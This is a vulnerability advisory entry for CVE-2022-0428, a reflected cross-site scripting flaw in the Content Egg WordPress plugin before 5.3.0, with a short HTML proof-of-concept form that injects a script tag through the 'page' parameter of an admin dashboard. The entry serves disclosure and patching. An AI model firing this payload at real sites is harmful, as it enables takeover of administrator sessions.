Content Egg < 5.3.0 – Reflected Cross-Site Scripting | CVE 2022-0428 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the page parameter before outputting back in an attribute in the Autoblogging admin dashboard, leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
    <form action="https://example.com/wp-admin/admin.php?page=content-egg-autoblog" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS/);</script>'>
        <input type="submit" value="Send">
    </form>
</html>

Affects Plugins

Fixed in 5.3.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

071a2f69-9cd6-42a8-a56c-264a589784ab

Timeline

Publicly Published

2022-04-06 (about 2 years ago)

Added

2022-04-06 (about 2 years ago)

Last Updated

2022-04-13 (about 2 years ago)

Other

Published

Title

Published

2024-04-22

Title

Max Addons Pro for Bricks < 1.6.2 - Reflected Cross-Site Scripting

Published

2023-11-07

Title

Under Construction / Maintenance Mode from Acurax <= 2.6 - Unauthenticated Stored XSS

Published

2019-07-22

Title

Ultimate Member <= 2.0.53 - Cross-Site Scripting (XSS)

Published

2014-08-01

Title

2-Click-Socialmedia-Buttons <= 0.34 - Cross Site Scripting

Published

2022-10-10

Title

Newspaper < 12 - Reflected Cross-Site Scripting